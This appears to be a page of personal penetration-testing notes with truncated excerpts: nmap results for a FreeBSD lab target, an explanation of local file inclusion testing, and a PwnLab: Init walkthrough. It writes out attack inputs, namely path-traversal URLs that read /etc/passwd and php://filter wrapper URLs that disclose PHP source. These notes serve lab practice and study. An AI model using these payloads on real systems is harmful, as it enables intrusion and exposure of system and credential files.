nagpentest

Walkthru Notes 2nd approach  using nc via web using php reverse shell 3rd approach   w/o metasploit =================== walkthru: 1.  Updating OpenFuck Exploit(764) but it didnt work here @ https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ 2. ============== Notes: 80/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC) Running: FreeBSD 9.X|10.X OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE PORT     STATE SERVICE VERSION 8080/tcp open  http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) |_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 |_http-title: 403 Forbidden MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox...

How to Test Since LFI occurs when paths passed to "include" statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following example: http://vulnerable_host/preview.php?file=example.html This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server. Typical proof-of-concept would be to load passwd file: http://vulnerable_host/preview.php?file=../../../../etc/passwd If the above mentioned conditions are met, an attacker would see something like the following: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin alex:x:500:500:alex:/home/alex:/bin/bash margo:x:501:501::/home/margo:/bin/bash ... Very often, even when such vu...

walkthru 1. https://alexsemaan.xyz/2017/02/20/vulnhub-pwnlabinit-walkthrough/ 2. https://www.abatchy.com/2016/11/pwnlab-init-walkthrough-vulnhub.html 3. https://www.vulnhub.com/entry/pwnlab-init,158/ ====== The page= variable in the URL, gave me the idea that the site may be vulnerable to some sort of injection. This lead me to Local File Inclusion (LFI). None of these worked: http://192.168.1.65/?page=/etc/passwd http://192.168.1.65/?page=/etc/passwd http://192.168.1.65/?page=../../../../../../../etc/passwd http://192.168.1.65/?page=../../../../../../../etc/passwd Yet, the following worked! http://192.168.1.65/?page=php://filter/convert.base64-encode/resource=config http://192.168.1.65/?page=php://filter/convert.base64-encode/resource=index http://192.168.1.65/?page=php://filter/convert.base64-encode/resource=upload Access the above pages to get base64 codes, decoded them to see the html adn understand the page logic and what is allowed...